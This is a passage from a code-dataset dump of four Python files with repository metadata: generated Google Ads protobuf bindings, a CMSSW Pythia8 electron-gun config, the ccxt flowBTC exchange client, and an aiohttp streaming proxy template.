_ADGROUPCRITERION_POSITIONESTIMATES.containing_type = _ADGROUPCRITERION
_ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_first_page_cpc_micros'].fields.append(
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_page_cpc_micros'])
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_page_cpc_micros'].containing_oneof = _ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_first_page_cpc_micros']
_ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_first_position_cpc_micros'].fields.append(
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_position_cpc_micros'])
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_position_cpc_micros'].containing_oneof = _ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_first_position_cpc_micros']
_ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_top_of_page_cpc_micros'].fields.append(
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['top_of_page_cpc_micros'])
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['top_of_page_cpc_micros'].containing_oneof = _ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_top_of_page_cpc_micros']
_ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_estimated_add_clicks_at_first_position_cpc'].fields.append(
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_clicks_at_first_position_cpc'])
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_clicks_at_first_position_cpc'].containing_oneof = _ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_estimated_add_clicks_at_first_position_cpc']
_ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_estimated_add_cost_at_first_position_cpc'].fields.append(
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_cost_at_first_position_cpc'])
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_cost_at_first_position_cpc'].containing_oneof = _ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_estimated_add_cost_at_first_position_cpc']
_ADGROUPCRITERION.fields_by_name['status'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__status__pb2._ADGROUPCRITERIONSTATUSENUM_ADGROUPCRITERIONSTATUS
_ADGROUPCRITERION.fields_by_name['quality_info'].message_type = _ADGROUPCRITERION_QUALITYINFO
_ADGROUPCRITERION.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__type__pb2._CRITERIONTYPEENUM_CRITERIONTYPE
_ADGROUPCRITERION.fields_by_name['system_serving_status'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__system__serving__status__pb2._CRITERIONSYSTEMSERVINGSTATUSENUM_CRITERIONSYSTEMSERVINGSTATUS
_ADGROUPCRITERION.fields_by_name['approval_status'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__approval__status__pb2._ADGROUPCRITERIONAPPROVALSTATUSENUM_ADGROUPCRITERIONAPPROVALSTATUS
_ADGROUPCRITERION.fields_by_name['effective_cpc_bid_source'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2._BIDDINGSOURCEENUM_BIDDINGSOURCE
_ADGROUPCRITERION.fields_by_name['effective_cpm_bid_source'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2._BIDDINGSOURCEENUM_BIDDINGSOURCE
_ADGROUPCRITERION.fields_by_name['effective_cpv_bid_source'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2._BIDDINGSOURCEENUM_BIDDINGSOURCE
_ADGROUPCRITERION.fields_by_name['effective_percent_cpc_bid_source'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2._BIDDINGSOURCEENUM_BIDDINGSOURCE
_ADGROUPCRITERION.fields_by_name['position_estimates'].message_type = _ADGROUPCRITERION_POSITIONESTIMATES
_ADGROUPCRITERION.fields_by_name['url_custom_parameters'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_custom__parameter__pb2._CUSTOMPARAMETER
_ADGROUPCRITERION.fields_by_name['keyword'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._KEYWORDINFO
_ADGROUPCRITERION.fields_by_name['placement'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._PLACEMENTINFO
_ADGROUPCRITERION.fields_by_name['mobile_app_category'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._MOBILEAPPCATEGORYINFO
_ADGROUPCRITERION.fields_by_name['mobile_application'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._MOBILEAPPLICATIONINFO
_ADGROUPCRITERION.fields_by_name['listing_group'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._LISTINGGROUPINFO
_ADGROUPCRITERION.fields_by_name['age_range'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._AGERANGEINFO
_ADGROUPCRITERION.fields_by_name['gender'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._GENDERINFO
_ADGROUPCRITERION.fields_by_name['income_range'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._INCOMERANGEINFO
_ADGROUPCRITERION.fields_by_name['parental_status'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._PARENTALSTATUSINFO
_ADGROUPCRITERION.fields_by_name['user_list'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._USERLISTINFO
_ADGROUPCRITERION.fields_by_name['youtube_video'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._YOUTUBEVIDEOINFO
_ADGROUPCRITERION.fields_by_name['youtube_channel'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._YOUTUBECHANNELINFO
_ADGROUPCRITERION.fields_by_name['topic'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._TOPICINFO
_ADGROUPCRITERION.fields_by_name['user_interest'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._USERINTERESTINFO
_ADGROUPCRITERION.fields_by_name['webpage'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._WEBPAGEINFO
_ADGROUPCRITERION.fields_by_name['app_payment_model'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._APPPAYMENTMODELINFO
_ADGROUPCRITERION.fields_by_name['custom_affinity'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._CUSTOMAFFINITYINFO
_ADGROUPCRITERION.fields_by_name['custom_intent'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._CUSTOMINTENTINFO
_ADGROUPCRITERION.fields_by_name['custom_audience'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._CUSTOMAUDIENCEINFO
_ADGROUPCRITERION.fields_by_name['combined_audience'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._COMBINEDAUDIENCEINFO
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['keyword'])
_ADGROUPCRITERION.fields_by_name['keyword'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['placement'])
_ADGROUPCRITERION.fields_by_name['placement'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['mobile_app_category'])
_ADGROUPCRITERION.fields_by_name['mobile_app_category'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['mobile_application'])
_ADGROUPCRITERION.fields_by_name['mobile_application'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['listing_group'])
_ADGROUPCRITERION.fields_by_name['listing_group'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['age_range'])
_ADGROUPCRITERION.fields_by_name['age_range'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['gender'])
_ADGROUPCRITERION.fields_by_name['gender'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['income_range'])
_ADGROUPCRITERION.fields_by_name['income_range'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['parental_status'])
_ADGROUPCRITERION.fields_by_name['parental_status'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['user_list'])
_ADGROUPCRITERION.fields_by_name['user_list'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['youtube_video'])
_ADGROUPCRITERION.fields_by_name['youtube_video'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['youtube_channel'])
_ADGROUPCRITERION.fields_by_name['youtube_channel'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['topic'])
_ADGROUPCRITERION.fields_by_name['topic'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['user_interest'])
_ADGROUPCRITERION.fields_by_name['user_interest'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['webpage'])
_ADGROUPCRITERION.fields_by_name['webpage'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['app_payment_model'])
_ADGROUPCRITERION.fields_by_name['app_payment_model'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['custom_affinity'])
_ADGROUPCRITERION.fields_by_name['custom_affinity'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['custom_intent'])
_ADGROUPCRITERION.fields_by_name['custom_intent'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['custom_audience'])
_ADGROUPCRITERION.fields_by_name['custom_audience'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['combined_audience'])
_ADGROUPCRITERION.fields_by_name['combined_audience'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['_criterion_id'].fields.append(
_ADGROUPCRITERION.fields_by_name['criterion_id'])
_ADGROUPCRITERION.fields_by_name['criterion_id'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_criterion_id']
_ADGROUPCRITERION.oneofs_by_name['_ad_group'].fields.append(
_ADGROUPCRITERION.fields_by_name['ad_group'])
_ADGROUPCRITERION.fields_by_name['ad_group'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_ad_group']
_ADGROUPCRITERION.oneofs_by_name['_negative'].fields.append(
_ADGROUPCRITERION.fields_by_name['negative'])
_ADGROUPCRITERION.fields_by_name['negative'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_negative']
_ADGROUPCRITERION.oneofs_by_name['_bid_modifier'].fields.append(
_ADGROUPCRITERION.fields_by_name['bid_modifier'])
_ADGROUPCRITERION.fields_by_name['bid_modifier'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_bid_modifier']
_ADGROUPCRITERION.oneofs_by_name['_cpc_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['cpc_bid_micros'])
_ADGROUPCRITERION.fields_by_name['cpc_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_cpc_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_cpm_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['cpm_bid_micros'])
_ADGROUPCRITERION.fields_by_name['cpm_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_cpm_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_cpv_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['cpv_bid_micros'])
_ADGROUPCRITERION.fields_by_name['cpv_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_cpv_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_percent_cpc_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['percent_cpc_bid_micros'])
_ADGROUPCRITERION.fields_by_name['percent_cpc_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_percent_cpc_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_effective_cpc_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['effective_cpc_bid_micros'])
_ADGROUPCRITERION.fields_by_name['effective_cpc_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_effective_cpc_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_effective_cpm_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['effective_cpm_bid_micros'])
_ADGROUPCRITERION.fields_by_name['effective_cpm_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_effective_cpm_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_effective_cpv_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['effective_cpv_bid_micros'])
_ADGROUPCRITERION.fields_by_name['effective_cpv_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_effective_cpv_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_effective_percent_cpc_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['effective_percent_cpc_bid_micros'])
_ADGROUPCRITERION.fields_by_name['effective_percent_cpc_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_effective_percent_cpc_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_final_url_suffix'].fields.append(
_ADGROUPCRITERION.fields_by_name['final_url_suffix'])
_ADGROUPCRITERION.fields_by_name['final_url_suffix'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_final_url_suffix']
_ADGROUPCRITERION.oneofs_by_name['_tracking_url_template'].fields.append(
_ADGROUPCRITERION.fields_by_name['tracking_url_template'])
_ADGROUPCRITERION.fields_by_name['tracking_url_template'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_tracking_url_template']
DESCRIPTOR.message_types_by_name['AdGroupCriterion'] = _ADGROUPCRITERION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
AdGroupCriterion = _reflection.GeneratedProtocolMessageType('AdGroupCriterion', (_message.Message,), {
'QualityInfo' : _reflection.GeneratedProtocolMessageType('QualityInfo', (_message.Message,), {
'DESCRIPTOR' : _ADGROUPCRITERION_QUALITYINFO,
'__module__' : 'google.ads.googleads.v6.resources.ad_group_criterion_pb2'
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo)
})
,
'PositionEstimates' : _reflection.GeneratedProtocolMessageType('PositionEstimates', (_message.Message,), {
'DESCRIPTOR' : _ADGROUPCRITERION_POSITIONESTIMATES,
'__module__' : 'google.ads.googleads.v6.resources.ad_group_criterion_pb2'
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates)
})
,
'DESCRIPTOR' : _ADGROUPCRITERION,
'__module__' : 'google.ads.googleads.v6.resources.ad_group_criterion_pb2'
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.resources.AdGroupCriterion)
})
_sym_db.RegisterMessage(AdGroupCriterion)
_sym_db.RegisterMessage(AdGroupCriterion.QualityInfo)
_sym_db.RegisterMessage(AdGroupCriterion.PositionEstimates)
DESCRIPTOR._options = None
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['quality_score']._options = None
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['creative_quality_score']._options = None
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['post_click_quality_score']._options = None
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['search_predicted_ctr']._options = None
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_page_cpc_micros']._options = None
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_position_cpc_micros']._options = None
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['top_of_page_cpc_micros']._options = None
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_clicks_at_first_position_cpc']._options = None
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_cost_at_first_position_cpc']._options = None
_ADGROUPCRITERION.fields_by_name['resource_name']._options = None
_ADGROUPCRITERION.fields_by_name['criterion_id']._options = None
_ADGROUPCRITERION.fields_by_name['quality_info']._options = None
_ADGROUPCRITERION.fields_by_name['ad_group']._options = None
_ADGROUPCRITERION.fields_by_name['type']._options = None
_ADGROUPCRITERION.fields_by_name['negative']._options = None
_ADGROUPCRITERION.fields_by_name['system_serving_status']._options = None
_ADGROUPCRITERION.fields_by_name['approval_status']._options = None
_ADGROUPCRITERION.fields_by_name['disapproval_reasons']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpc_bid_micros']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpm_bid_micros']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpv_bid_micros']._options = None
_ADGROUPCRITERION.fields_by_name['effective_percent_cpc_bid_micros']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpc_bid_source']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpm_bid_source']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpv_bid_source']._options = None
_ADGROUPCRITERION.fields_by_name['effective_percent_cpc_bid_source']._options = None
_ADGROUPCRITERION.fields_by_name['position_estimates']._options = None
_ADGROUPCRITERION.fields_by_name['keyword']._options = None
_ADGROUPCRITERION.fields_by_name['placement']._options = None
_ADGROUPCRITERION.fields_by_name['mobile_app_category']._options = None
_ADGROUPCRITERION.fields_by_name['mobile_application']._options = None
_ADGROUPCRITERION.fields_by_name['listing_group']._options = None
_ADGROUPCRITERION.fields_by_name['age_range']._options = None
_ADGROUPCRITERION.fields_by_name['gender']._options = None
_ADGROUPCRITERION.fields_by_name['income_range']._options = None
_ADGROUPCRITERION.fields_by_name['parental_status']._options = None
_ADGROUPCRITERION.fields_by_name['user_list']._options = None
_ADGROUPCRITERION.fields_by_name['youtube_video']._options = None
_ADGROUPCRITERION.fields_by_name['youtube_channel']._options = None
_ADGROUPCRITERION.fields_by_name['topic']._options = None
_ADGROUPCRITERION.fields_by_name['user_interest']._options = None
_ADGROUPCRITERION.fields_by_name['webpage']._options = None
_ADGROUPCRITERION.fields_by_name['app_payment_model']._options = None
_ADGROUPCRITERION.fields_by_name['custom_affinity']._options = None
_ADGROUPCRITERION.fields_by_name['custom_intent']._options = None
_ADGROUPCRITERION.fields_by_name['custom_audience']._options = None
_ADGROUPCRITERION.fields_by_name['combined_audience']._options = None
_ADGROUPCRITERION._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
df84bf9d01fc1b6084257e37167497a0c70e75dd | a5a99f646e371b45974a6fb6ccc06b0a674818f2 | /Configuration/Generator/python/SingleElectronFlatPt5To100_pythia8_cfi.py | 37df2ba0d8904688e35cfd867a38350252f6e5ef | [
"Apache-2.0"
] | permissive | cms-sw/cmssw | 4ecd2c1105d59c66d385551230542c6615b9ab58 | 19c178740257eb48367778593da55dcad08b7a4f | refs/heads/master | 2023-08-23T21:57:42.491143 | 2023-08-22T20:22:40 | 2023-08-22T20:22:40 | 10,969,551 | 1,006 | 3,696 | Apache-2.0 | 2023-09-14T19:14:28 | 2013-06-26T14:09:07 | C++ | UTF-8 | Python | false | false | 813 | py | import FWCore.ParameterSet.Config as cms
generator = cms.EDFilter("Pythia8PtGun",
PGunParameters = cms.PSet(
MaxPt = cms.double(5.),
MinPt = cms.double(100.),
ParticleID = cms.vint32(11),
AddAntiParticle = cms.bool(True),
MaxEta = cms.double(2.5),
MaxPhi = cms.double(3.14159265359),
MinEta = cms.double(-2.5),
MinPhi = cms.double(-3.14159265359) ## in radians
),
Verbosity = cms.untracked.int32(0), ## set to 1 (or greater) for printouts
psethack = cms.string('single electron pt 5 to 100'),
firstRun = cms.untracked.uint32(1),
PythiaParameters = cms.PSet(parameterSets = cms.vstring())
)
| [
"[email protected]"
] | |
7c258ecc296b93e65bf8e0cbc5b9c3df0c21f607 | 21818228cb62d31b9685de44deb27cfd90430573 | /ccxt/flowbtc.py | 2153a8b8e285212a60a2754aaf3d616c1ebb77d1 | [] | no_license | mico/cryptoArbitrage | d9d5d2f89e3fccc0b84d9c13b771edef0f2b00a1 | ea9ef03e79f302b36948746c77e4acbb3d6f01b7 | refs/heads/master | 2021-03-22T00:17:30.448593 | 2018-05-28T05:08:21 | 2018-05-28T05:08:21 | 108,232,310 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 7,310 | py | # -*- coding: utf-8 -*-
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
class flowbtc (Exchange):
def describe(self):
return self.deep_extend(super(flowbtc, self).describe(), {
'id': 'flowbtc',
'name': 'flowBTC',
'countries': 'BR', # Brazil
'version': 'v1',
'rateLimit': 1000,
'hasCORS': True,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/28162465-cd815d4c-67cf-11e7-8e57-438bea0523a2.jpg',
'api': 'https://api.flowbtc.com:8400/ajax',
'www': 'https://trader.flowbtc.com',
'doc': 'http://www.flowbtc.com.br/api/',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'uid': True,
},
'api': {
'public': {
'post': [
'GetTicker',
'GetTrades',
'GetTradesByDate',
'GetOrderBook',
'GetProductPairs',
'GetProducts',
],
},
'private': {
'post': [
'CreateAccount',
'GetUserInfo',
'SetUserInfo',
'GetAccountInfo',
'GetAccountTrades',
'GetDepositAddresses',
'Withdraw',
'CreateOrder',
'ModifyOrder',
'CancelOrder',
'CancelAllOrders',
'GetAccountOpenOrders',
'GetOrderFee',
],
},
},
})
def fetch_markets(self):
response = self.publicPostGetProductPairs()
markets = response['productPairs']
result = []
for p in range(0, len(markets)):
market = markets[p]
id = market['name']
base = market['product1Label']
quote = market['product2Label']
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privatePostGetAccountInfo()
balances = response['currencies']
result = {'info': response}
for b in range(0, len(balances)):
balance = balances[b]
currency = balance['name']
account = {
'free': balance['balance'],
'used': balance['hold'],
'total': 0.0,
}
account['total'] = self.sum(account['free'], account['used'])
result[currency] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
orderbook = self.publicPostGetOrderBook(self.extend({
'productPair': market['id'],
}, params))
return self.parse_order_book(orderbook, None, 'bids', 'asks', 'px', 'qty')
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
ticker = self.publicPostGetTicker(self.extend({
'productPair': market['id'],
}, params))
timestamp = self.milliseconds()
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': float(ticker['high']),
'low': float(ticker['low']),
'bid': float(ticker['bid']),
'ask': float(ticker['ask']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': float(ticker['last']),
'change': None,
'percentage': None,
'average': None,
'baseVolume': float(ticker['volume24hr']),
'quoteVolume': float(ticker['volume24hrProduct2']),
'info': ticker,
}
def parse_trade(self, trade, market):
timestamp = trade['unixtime'] * 1000
side = 'buy' if (trade['incomingOrderSide'] == 0) else 'sell'
return {
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'id': str(trade['tid']),
'order': None,
'type': None,
'side': side,
'price': trade['px'],
'amount': trade['qty'],
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
response = self.publicPostGetTrades(self.extend({
'ins': market['id'],
'startIndex': -1,
}, params))
return self.parse_trades(response['trades'], market)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
orderType = 1 if (type == 'market') else 0
order = {
'ins': self.market_id(symbol),
'side': side,
'orderType': orderType,
'qty': amount,
'px': price,
}
response = self.privatePostCreateOrder(self.extend(order, params))
return {
'info': response,
'id': response['serverOrderId'],
}
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
if 'ins' in params:
return self.privatePostCancelOrder(self.extend({
'serverOrderId': id,
}, params))
raise ExchangeError(self.id + ' requires `ins` symbol parameter for cancelling an order')
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.version + '/' + path
if api == 'public':
if params:
body = self.json(params)
else:
self.check_required_credentials()
nonce = self.nonce()
auth = str(nonce) + self.uid + self.apiKey
signature = self.hmac(self.encode(auth), self.encode(self.secret))
body = self.json(self.extend({
'apiKey': self.apiKey,
'apiNonce': nonce,
'apiSig': signature.upper(),
}, params))
headers = {
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = self.fetch2(path, api, method, params, headers, body)
if 'isAccepted' in response:
if response['isAccepted']:
return response
raise ExchangeError(self.id + ' ' + self.json(response))
| [
"[email protected]"
] | |
dcd8e325ace6b51794580b2b65cb39022b4d9256 | 837ebd601d0882e370522719606c975b9c815ad2 | /adm/templates/plugins/mediation/{{cookiecutter.name}}/main/application.py | 9ee876166f3b2151ae78f6033bb9438e0b514679 | [
"BSD-3-Clause"
] | permissive | dearith/mfserv | 8ba97e211d31a177fc6de160cd4b1f8555ebf600 | ad72e51bf77595a75dcb2600d7323f13e2c2fb4b | refs/heads/master | 2021-08-15T21:17:30.528351 | 2019-04-25T10:25:58 | 2019-04-25T10:25:58 | 183,577,154 | 0 | 0 | null | 2019-04-26T07:10:44 | 2019-04-26T07:10:43 | null | UTF-8 | Python | false | false | 2,141 | py | from aiohttp import web, ClientSession
from aiohttp_metwork_middlewares import mflog_middleware
CHUNK_SIZE = 4096 * 1024
STREAMING_MODE = True
async def handle(request):
# Log something with context aware logger
log = request['mflog_logger']
http_method = request.method
url_path_qs = request.path_qs
log.info("got a %s call on %s" % (http_method, url_path_qs))
# For this example, we limit the service to GET/HEAD methods
if http_method not in ["GET", "HEAD"]:
return web.Response(status=405)
# Let's build the backend url
backend_url = "http://mybackend%s" % url_path_qs
async with ClientSession() as session:
log.info("calling %s on %s..." % (http_method, backend_url))
async with session.get(backend_url) as resp:
backend_status = resp.status
log.info("got an HTTP/%i status" % backend_status)
if not STREAMING_MODE:
######################
# NON STREAMING MODE #
######################
body = await resp.read()
response = web.Response(
headers={"Content-Type": resp.headers['Content-Type']},
body=body
)
else:
##################
# STREAMING MODE #
##################
# Let's prepare a streaming response
response = web.StreamResponse(
headers={"Content-Type": resp.headers['Content-Type']}
)
await response.prepare(request)
response.content_type = resp.headers['Content-Type']
# Let's stream the response body to avoid storing it in memory
while True:
chunk = await resp.content.read(CHUNK_SIZE)
if not chunk:
break
await response.write(chunk)
await response.write_eof()
return response
app = web.Application(middlewares=[mflog_middleware])
app.router.add_route('*', '/{tail:.*}', handle)
| [
"[email protected]"
] | |
